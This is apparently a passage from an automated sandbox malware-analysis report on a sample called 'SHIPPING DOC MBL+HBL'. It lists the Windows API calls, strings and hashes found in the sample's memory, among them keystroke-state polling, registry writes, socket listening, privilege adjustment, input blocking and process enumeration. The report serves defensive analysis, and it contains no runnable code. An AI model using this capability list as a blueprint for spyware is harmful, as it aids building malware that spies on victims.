                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: 2330388e521edb1de0076cb0beb3b408be4da281b2784fa3ce239eda8d45b836
                    • Instruction ID: b8bf965d74d6df54a5b2b030e6f17d659f37e00b355fcbb835b67ef9db0ccc94
                    • Opcode Fuzzy Hash: 2330388e521edb1de0076cb0beb3b408be4da281b2784fa3ce239eda8d45b836
                    • Instruction Fuzzy Hash: D431F332541219AEDF10EFB0FC59AEE77AC9F493A4F101175E808F21A2DB30DA49CB64
                    APIs
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E809DE
                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00E8F910,00000000,?,00000000,?,?), ref: 00E80A4C
                    • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00E80A94
                    • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00E80B1D
                    • RegCloseKey.ADVAPI32(?), ref: 00E80E3D
                    • RegCloseKey.ADVAPI32(00000000), ref: 00E80E4A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Close$ConnectCreateRegistryValue
                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                    • API String ID: 536824911-966354055
                    • Opcode ID: 9eb1ffa456a3a6baa18d15495984a444034d63e00e4f8762da28840b39d38113
                    • Instruction ID: d9fd5a4ac70d878c3c481031f9f5f4b5f285ad274927bfd577f06eb96498af97
                    • Opcode Fuzzy Hash: 9eb1ffa456a3a6baa18d15495984a444034d63e00e4f8762da28840b39d38113
                    • Instruction Fuzzy Hash: 84025E752006119FCB14EF28C855E6AB7E5FF88714F04985DF989AB3A2CB34ED45CB81
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID: 0D$0E$0F$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa$UCP)$UTF)$UTF16)$pG
                    • API String ID: 0-2251986989
                    • Opcode ID: 13e6db9623818f93338d991bd1a334229a311236028690efbdecabf9a71f055c
                    • Instruction ID: cbbb5bd105de7cc2bde4e65d879ac45d3703ba964647f380b9f52eb5fc54ea66
                    • Opcode Fuzzy Hash: 13e6db9623818f93338d991bd1a334229a311236028690efbdecabf9a71f055c
                    • Instruction Fuzzy Hash: DB728E75E002199BDB24DF59D8407EEB7F5FF48314F1494AAE819BB280EB709E85CB90
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00E6F19F
                    • _wcscmp.LIBCMT ref: 00E6F1B4
                    • _wcscmp.LIBCMT ref: 00E6F1CB
                      • Part of subcall function 00E643C6: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E643E1
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00E6F1FA
                    • FindClose.KERNEL32(00000000), ref: 00E6F205
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00E6F221
                    • _wcscmp.LIBCMT ref: 00E6F248
                    • _wcscmp.LIBCMT ref: 00E6F25F
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00E6F271
                    • SetCurrentDirectoryW.KERNEL32(00EB8920), ref: 00E6F28F
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E6F299
                    • FindClose.KERNEL32(00000000), ref: 00E6F2A6
                    • FindClose.KERNEL32(00000000), ref: 00E6F2B8
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                    • String ID: *.*
                    • API String ID: 1824444939-438819550
                    • Opcode ID: dfbb621f87fe863d9e33c041d1ed235561e0efdec227d50dbe877ecf3847e9c1
                    • Instruction ID: ac6e13e9b2a46d10150b857259ae2dea8ee33b7f92b22ef3f41d50da0e13e2c0
                    • Opcode Fuzzy Hash: dfbb621f87fe863d9e33c041d1ed235561e0efdec227d50dbe877ecf3847e9c1
                    • Instruction Fuzzy Hash: 8831C0365416196EDB10AFA5FC68AEE77AC9F453A8F102171E808B21B1DB30DE85CF54
                    APIs
                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E6A299
                    • __swprintf.LIBCMT ref: 00E6A2BB
                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E6A2F8
                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E6A31D
                    • _memset.LIBCMT ref: 00E6A33C
                    • _wcsncpy.LIBCMT ref: 00E6A378
                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E6A3AD
                    • CloseHandle.KERNEL32(00000000), ref: 00E6A3B8
                    • RemoveDirectoryW.KERNEL32(?), ref: 00E6A3C1
                    • CloseHandle.KERNEL32(00000000), ref: 00E6A3CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                    • String ID: :$\$\??\%s
                    • API String ID: 2733774712-3457252023
                    • Opcode ID: 9c016a1742530db0d0642bce4dae6782742a8e08227c0147b5b2b46d867cee64
                    • Instruction ID: 637abb18fa0b188170c14596d7f99449395f7f24d58a1e672eaebfd2a41039ed
                    • Opcode Fuzzy Hash: 9c016a1742530db0d0642bce4dae6782742a8e08227c0147b5b2b46d867cee64
                    • Instruction Fuzzy Hash: B531C0B1940119ABDB209FA1EC49FEF73BCEF88740F1451B6FA08F6160E77096448B24
                    APIs
                      • Part of subcall function 00E5852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E58546
                      • Part of subcall function 00E5852A: GetLastError.KERNEL32(?,00E5800A,?,?,?), ref: 00E58550
                      • Part of subcall function 00E5852A: GetProcessHeap.KERNEL32(00000008,?,?,00E5800A,?,?,?), ref: 00E5855F
                      • Part of subcall function 00E5852A: HeapAlloc.KERNEL32(00000000,?,00E5800A,?,?,?), ref: 00E58566
                      • Part of subcall function 00E5852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E5857D
                      • Part of subcall function 00E585C7: GetProcessHeap.KERNEL32(00000008,00E58020,00000000,00000000,?,00E58020,?), ref: 00E585D3
                      • Part of subcall function 00E585C7: HeapAlloc.KERNEL32(00000000,?,00E58020,?), ref: 00E585DA
                      • Part of subcall function 00E585C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E58020,?), ref: 00E585EB
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E58238
                    • _memset.LIBCMT ref: 00E5824D
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E5826C
                    • GetLengthSid.ADVAPI32(?), ref: 00E5827D
                    • GetAce.ADVAPI32(?,00000000,?), ref: 00E582BA
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E582D6
                    • GetLengthSid.ADVAPI32(?), ref: 00E582F3
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E58302
                    • HeapAlloc.KERNEL32(00000000), ref: 00E58309
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E5832A
                    • CopySid.ADVAPI32(00000000), ref: 00E58331
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E58362
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E58388
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E5839C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: b6127928acc1f444c26549ec6c1f1bf1a5d1494384a7ba4844d931f359a4597b
                    • Instruction ID: 831cfb9abe10efc03366efa06339264f6e7df425a3e22fbf7f53d2a6b851b6dd
                    • Opcode Fuzzy Hash: b6127928acc1f444c26549ec6c1f1bf1a5d1494384a7ba4844d931f359a4597b
                    • Instruction Fuzzy Hash: 5C616671A0020AEFDF10CFA5DD45AEEBBB9FF04706F148529F915B6291DB319A09CB60
                    APIs
                      • Part of subcall function 00E80EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E7FE38,?,?), ref: 00E80EBC
                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E80537
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00E805D6
                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00E8066E
                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00E808AD
                    • RegCloseKey.ADVAPI32(00000000), ref: 00E808BA
                    Similarity
                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                    • String ID:
                    • API String ID: 1240663315-0
                    Strings
                    Similarity
                    • API ID:
                    • String ID: 0D$0D$ERCP$Oa$VUUU$VUUU$VUUU$VUUU
                    • API String ID: 0-4146286616
                    APIs
                    • GetKeyboardState.USER32(?), ref: 00E60062
                    • GetAsyncKeyState.USER32(000000A0), ref: 00E600E3
                    • GetKeyState.USER32(000000A0), ref: 00E600FE
                    • GetAsyncKeyState.USER32(000000A1), ref: 00E60118
                    • GetKeyState.USER32(000000A1), ref: 00E6012D
                    • GetAsyncKeyState.USER32(00000011), ref: 00E60145
                    • GetKeyState.USER32(00000011), ref: 00E60157
                    • GetAsyncKeyState.USER32(00000012), ref: 00E6016F
                    • GetKeyState.USER32(00000012), ref: 00E60181
                    • GetAsyncKeyState.USER32(0000005B), ref: 00E60199
                    • GetKeyState.USER32(0000005B), ref: 00E601AB
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    APIs
                      • Part of subcall function 00E09997: __itow.LIBCMT ref: 00E099C2
                      • Part of subcall function 00E09997: __swprintf.LIBCMT ref: 00E09A0C
                    • CoInitialize.OLE32 ref: 00E78518
                    • CoUninitialize.OLE32 ref: 00E78523
                    • CoCreateInstance.OLE32(?,00000000,00000017,00E92BEC,?), ref: 00E78583
                    • IIDFromString.OLE32(?,?), ref: 00E785F6
                    • VariantInit.OLEAUT32(?), ref: 00E78690
                    • VariantClear.OLEAUT32(?), ref: 00E786F1
                    Strings
                    Similarity
                    • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                    • API String ID: 834269672-1287834457
                    APIs
                    Similarity
                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                    • String ID:
                    • API String ID: 1737998785-0
                    APIs
                      • Part of subcall function 00E048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E048A1,?,?,00E037C0,?), ref: 00E048CE
                      • Part of subcall function 00E64AD8: GetFileAttributesW.KERNEL32(?,00E6374F), ref: 00E64AD9
                    • FindFirstFileW.KERNEL32(?,?), ref: 00E638E7
                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E6398F
                    • MoveFileW.KERNEL32(?,?), ref: 00E639A2
                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E639BF
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E639E1
                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E639FD
                    Strings
                    Similarity
                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                    • String ID: \*.*
                    • API String ID: 4002782344-1173974218
                    APIs
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00E6F4CC
                    • Sleep.KERNEL32(0000000A), ref: 00E6F4FC
                    • _wcscmp.LIBCMT ref: 00E6F510
                    • _wcscmp.LIBCMT ref: 00E6F52B
                    • FindNextFileW.KERNEL32(?,?), ref: 00E6F5C9
                    • FindClose.KERNEL32(00000000), ref: 00E6F5DF
                    Strings
                    Similarity
                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                    • String ID: *.*
                    • API String ID: 713712311-438819550
                    APIs
                    Similarity
                    • API ID: _memmove
                    • String ID:
                    • API String ID: 4104443479-0
                    APIs
                      • Part of subcall function 00E20F36: std::exception::exception.LIBCMT ref: 00E20F6C
                      • Part of subcall function 00E20F36: __CxxThrowException@8.LIBCMT ref: 00E20F81
                    • _memmove.LIBCMT ref: 00E505AE
                    • _memmove.LIBCMT ref: 00E506C3
                    • _memmove.LIBCMT ref: 00E5076A
                    Strings
                    Similarity
                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                    • String ID: yZ
                    • API String ID: 1300846289-3798167742
                    APIs
                      • Part of subcall function 00E58AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E58AED
                      • Part of subcall function 00E58AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58B1A
                      • Part of subcall function 00E58AA3: GetLastError.KERNEL32 ref: 00E58B27
                    • ExitWindowsEx.USER32(?,00000000), ref: 00E652A0
                    Strings
                    Similarity
                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                    • String ID: $@$SeShutdownPrivilege
                    • API String ID: 2234035333-194228
                    Strings
                    Similarity
                    • API ID: __itow__swprintf
                    • String ID: Oa
                    • API String ID: 674341424-3945284152
                    APIs
                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00E763F2
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E76401
                    • bind.WSOCK32(00000000,?,00000010), ref: 00E7641D
                    • listen.WSOCK32(00000000,00000005), ref: 00E7642C
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E76446
                    • closesocket.WSOCK32(00000000,00000000), ref: 00E7645A
                    Similarity
                    • API ID: ErrorLast$bindclosesocketlistensocket
                    • String ID:
                    • API String ID: 1279440585-0
                    APIs
                      • Part of subcall function 00E02612: GetWindowLongW.USER32(?,000000EB), ref: 00E02623
                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E019FA
                    • GetSysColor.USER32(0000000F), ref: 00E01A4E
                    • SetBkColor.GDI32(?,00000000), ref: 00E01A61
                      • Part of subcall function 00E01290: DefDlgProcW.USER32(?,00000020,?), ref: 00E012D8
                    Similarity
                    • API ID: ColorProc$LongWindow
                    • String ID:
                    • API String ID: 3744519093-0
                    APIs
                      • Part of subcall function 00E77EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00E77ECB
                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00E768B4
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E768DD
                    • bind.WSOCK32(00000000,?,00000010), ref: 00E76916
                    • WSAGetLastError.WSOCK32(00000000), ref: 00E76923
                    • closesocket.WSOCK32(00000000,00000000), ref: 00E76937
                    Similarity
                    • API ID: ErrorLast$bindclosesocketinet_addrsocket
                    • String ID:
                    • API String ID: 99427753-0
                    APIs
                    Similarity
                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                    • String ID:
                    • API String ID: 292994002-0
                    APIs
                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00E41CB7,?), ref: 00E7C112
                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00E7C124
                    Strings
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetSystemWow64DirectoryW$kernel32.dll
                    • API String ID: 2574300362-1816364905
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00E7EF51
                    • Process32FirstW.KERNEL32(00000000,?), ref: 00E7EF5F
                      • Part of subcall function 00E07F41: _memmove.LIBCMT ref: 00E07F82
                    • Process32NextW.KERNEL32(00000000,?), ref: 00E7F01F
                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E7F02E
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                    • String ID:
                    • API String ID: 2576544623-0
                    APIs
                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E5E93A
                    Strings
                    Similarity
                    • API ID: lstrlen
                    • String ID: ($|
                    • API String ID: 1659193697-1631851259
                    APIs
                    • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00E71920,00000000), ref: 00E724F7
                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00E7252E
                    Similarity
                    • API ID: Internet$AvailableDataFileQueryRead
                    • String ID:
                    • API String ID: 599397726-0
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00E6B3CF
                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00E6B429
                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00E6B476
                    Similarity
                    • API ID: ErrorMode$DiskFreeSpace
                    • String ID:
                    • API String ID: 1682464887-0
                    APIs
                      • Part of subcall function 00E20F36: std::exception::exception.LIBCMT ref: 00E20F6C
                      • Part of subcall function 00E20F36: __CxxThrowException@8.LIBCMT ref: 00E20F81
                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E58AED
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E58B1A
                    • GetLastError.KERNEL32 ref: 00E58B27
                    Similarity
                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                    • String ID:
                    • API String ID: 1922334811-0
                    APIs
                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E64A31
                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00E64A48
                    • FreeSid.ADVAPI32(?), ref: 00E64A58
                    Similarity
                    • API ID: AllocateCheckFreeInitializeMembershipToken
                    • String ID:
                    • API String ID: 3429775523-0
                    APIs
                    • __time64.LIBCMT ref: 00E68944
                      • Part of subcall function 00E2537A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00E69017,00000000,?,?,?,?,00E691C8,00000000,?), ref: 00E25383
                      • Part of subcall function 00E2537A: __aulldiv.LIBCMT ref: 00E253A3
                    Strings
                    Similarity
                    • API ID: Time$FileSystem__aulldiv__time64
                    • String ID: 0e
                    • API String ID: 2893107130-533242481
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00E6C787
                    • FindClose.KERNEL32(00000000), ref: 00E6C7B7
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    APIs
                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00E7957D,?,00E8FB84,?), ref: 00E6A121
                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00E7957D,?,00E8FB84,?), ref: 00E6A133
                    Similarity
                    • API ID: ErrorFormatLastMessage
                    • String ID:
                    • API String ID: 3479602957-0
                    APIs
                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E58631), ref: 00E58508
                    • CloseHandle.KERNEL32(?,?,00E58631), ref: 00E5851A
                    Similarity
                    • API ID: AdjustCloseHandlePrivilegesToken
                    • String ID:
                    • API String ID: 81990902-0
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E28ED7,?,?,?,00000001), ref: 00E2A2DA
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00E2A2E3
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    APIs
                    • BlockInput.USER32(00000001), ref: 00E7403A
                    Similarity
                    • API ID: BlockInput
                    • String ID:
                    • API String ID: 3456056419-0
                    APIs
                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00E64D1D
                    Similarity
                    • API ID: mouse_event
                    • String ID:
                    • API String ID: 2434400541-0
                    APIs
                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00E586B1), ref: 00E58A93
                    Similarity
                    • API ID: LogonUser
                    • String ID:
                    • API String ID: 1244722697-0
                    APIs
                    • GetUserNameW.ADVAPI32(?,?), ref: 00E42171
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00E2A2AA
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: a816f6458c704e89912322086d106a0f1de0611329d945dc8b2641fa7f358b06
                    • Instruction ID: 5b5a46477a0c8aed7dd83651fecdb38cdd4e60e6bbb12e351a11ec94d01ae46b
                    • Opcode Fuzzy Hash: a816f6458c704e89912322086d106a0f1de0611329d945dc8b2641fa7f358b06
                    • Instruction Fuzzy Hash: F6A0113000020CAB8A002B82EC08888BFACEB022A0B008020F80C800228B32A8208A80
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 0b44bd65fe6c8f624e510713d66af8b7647774a9e817973d9595cb79065cadc8
                    • Instruction ID: 4ec0b1f5b3bb75e5067e53873ec1d7243fd94befcc289d06f93b87145db66302
                    • Opcode Fuzzy Hash: 0b44bd65fe6c8f624e510713d66af8b7647774a9e817973d9595cb79065cadc8
                    • Instruction Fuzzy Hash: 93224976508645CBCF388A18C6A4BFD77A1FF01309F64A86ADC56BB591DB309DC5C740
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: 9545f027c52ac9ce5f79948cd953770bdfbfe2cbdd504a4b075f918b0ac83ea1
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: FEC1993220507309EF2D4639A53413EFFA15EA27B631A27ADE4B3EB1D5EF50C664D620
                    Memory Dump Source
                    • Source File: 00000000.00000002.1711343538.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                    • Associated: 00000000.00000002.1711330995.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000E8F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711384777.0000000000EB4000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711420946.0000000000EBE000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1711438020.0000000000EC7000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e00000_SHIPPING DOC MBL+HBL.jbxd
                    Similarity
                    • API ID:
                    • String ID:
